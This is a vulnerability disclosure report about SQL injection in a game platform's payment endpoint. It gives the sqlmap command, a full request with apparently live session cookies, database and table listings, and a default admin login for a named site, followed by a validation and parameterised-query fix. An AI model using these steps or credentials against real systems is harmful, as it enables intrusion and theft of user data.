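2016-04-28: Details reported to the vendor; awaiting vendor action
2016-04-28: Vendor confirmed; details disclosed to the vendor only
2016-05-08: Details disclosed to core white hats and experts in related fields
2016-05-18: Details disclosed to regular white hats
2016-05-28: Details disclosed to trainee white hats
2016-06-12: Details disclosed to the public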
As the title says.
POST injection syntax: sqlmap.py -r 1.txt --dbs
Injected parameter: sid

====================POST request=======================
POST /index.php?c=pay&a=testgamerole HTTP/1.1
Host: wan.40407.com
Proxy-Connection: keep-alive
Content-Length: 36
Accept: */*
Origin: http://wan.40407.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://wan.40407.com/index.php?c=pay&pt=pt
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D

username=heise123&gid=5&sid=32&isyk=
Database information
available databases [25]:
[*] `14x`
[*] `399wantg`
[*] `40407box_test`
[*] `40407box`
[*] `40407boxpt_test`
[*] `40407boxpt`
[*] `40407boxstat`
[*] `40407data`
[*] `40407kfz`
[*] `40407lol`
[*] `40407tqyt`
[*] `dkwdv{`
[*] `kp.ya58.cn`
[*] `s}\x1a!\x03!`
[*] `ucentir)\x11`
[*] `xiro7!`
[*] bcgua
[*] information_schema
[*] mysql
[*] percona
[*] performance_schema
[*] projeit
[*] smweb
[*] testcy
[*] tuan
Tables in the current database
Database: 40407boxpt
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| box_game_tg_data     | 761184  |
| box_game_member      | 450339  |
| box_gamecard_sn      | 280019  |
| box_pay              | 22280   |
| box_score_record     | 4632    |
| box_score_playinfo   | 4016    |
| box_member_mac       | 3041    |
| box_content_1        | 2220    |
| box_content_1_extend | 1900    |
| box_score_rule       | 1306    |
| box_pk_username      | 1074    |
| box_game_server      | 650     |
| box_content_1_item   | 576     |
| box_jf_pay           | 479     |
| box_tag              | 236     |
| box_admin_user       | 227     |
| box_score_game       | 160     |
| box_content_1_sjsg   | 139     |
| box_score_pay        | 139     |
| box_category         | 131     |
| box_content_1_jjsg   | 125     |
| box_content_1_sjtl   | 90      |
| box_content_1_hero   | 67      |
| box_content_1_zwx    | 67      |
| box_content_1_nslm   | 55      |
| box_model            | 35      |
| box_model_field      | 35      |
| box_game             | 34      |
| box_content_1_rxsg2  | 32      |
| box_content_1_jyjh   | 29      |
| box_content_1_ocean  | 26      |
| box_content_1_hwsg   | 25      |
| box_content_1_mycs   | 25      |
| box_user_tg          | 24      |
| box_pay_cycle        | 23      |
| box_linkage          | 18      |
| box_ad               | 16      |
| box_content_1_jyjx   | 16      |
| box_pk_game          | 13      |
| box_pk_number        | 13      |
| box_content          | 12      |
| box_gid_modelid      | 10      |
| box_pingtaibi_fanli  | 10      |
| box_pk_rule          | 10      |
| box_content_1_bztx   | 8       |
| box_plugin           | 6       |
| box_content_1_smzt   | 5       |
| box_member_group     | 5       |
| box_admin_group      | 4       |
| box_content_1_jz     | 4       |
| box_content_1_rxsg   | 4       |
| box_role             | 4       |
| box_content_1_mjll   | 3       |
| box_wan_top_gg       | 3       |
| box_content_1_dsg    | 2       |
| box_content_1_game   | 2       |
| box_content_1_swydn  | 2       |
| box_content_1_xbjz   | 2       |
+----------------------+---------+
-------------------------------------
Database: 40407boxpt (450,000 user records)
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| box_game_member | 450339  |
+-----------------+---------+
The 200,000+ entries are probably card key information, there are 700,000+ entries of some other kind of information, plus payment information and so on.
Because this is a time-delay injection, I did not dump the data here as proof.
======================================================================
http://tg.40407.com/admin/mainindex/index: log in with admin / 123456
The game promotion information can be modified.
Some user information
Filter input; strengthen passwords
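The parameter filtering asked for above, as an added example that is not code from the report or from the vendor: the three fields of the POST body (username, gid, sid) are checked against an allow-list and then bound as query parameters. Python with sqlite3 stands in for the PHP application; the game_role table, its columns and the accepted formats are assumptions.

```python
import re
import sqlite3

# Field names are from the POST body above; the formats allowed are assumptions.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,32}")
ID_RE = re.compile(r"[0-9]{1,9}")  # ASCII digits only; str.isdigit() also accepts other scripts


def parse_role_request(form):
    """Allow-list check of username, gid and sid; raises ValueError naming the bad field."""
    username = form.get("username", "")
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username")
    ids = []
    for name in ("gid", "sid"):
        raw = form.get(name, "")
        if not ID_RE.fullmatch(raw):
            raise ValueError(name)
        ids.append(int(raw))
    return username, ids[0], ids[1]


def query_role(conn, username, gid, sid):
    """Second layer: placeholders bind values as data, so they never become SQL text."""
    row = conn.execute(
        "SELECT role_name FROM game_role WHERE username = ? AND gid = ? AND sid = ?",
        (username, gid, sid),
    ).fetchone()
    return row[0] if row else None


def handle(conn, form):
    """Return (status, body) without echoing database errors to the client."""
    try:
        username, gid, sid = parse_role_request(form)
    except ValueError as bad:
        return 400, "invalid parameter: %s" % bad
    role = query_role(conn, username, gid, sid)
    return (200, role) if role else (404, "no role")


def make_demo_db():
    """Constructed sample data; game_role and its columns are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE game_role (username TEXT, gid INTEGER, sid INTEGER, role_name TEXT)"
    )
    conn.execute("INSERT INTO game_role VALUES ('demo_user', 5, 32, 'DemoRole')")
    return conn
```

Validation rejects a non-numeric sid before any query runs, and the bound parameter means a value that slips past validation is still compared as data.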
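Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-04-28 10:54
Thanks. Parameter filtering still needs to be strengthened. The platform had not gone live; it was in internal testing, so the password had not been changed...
None yet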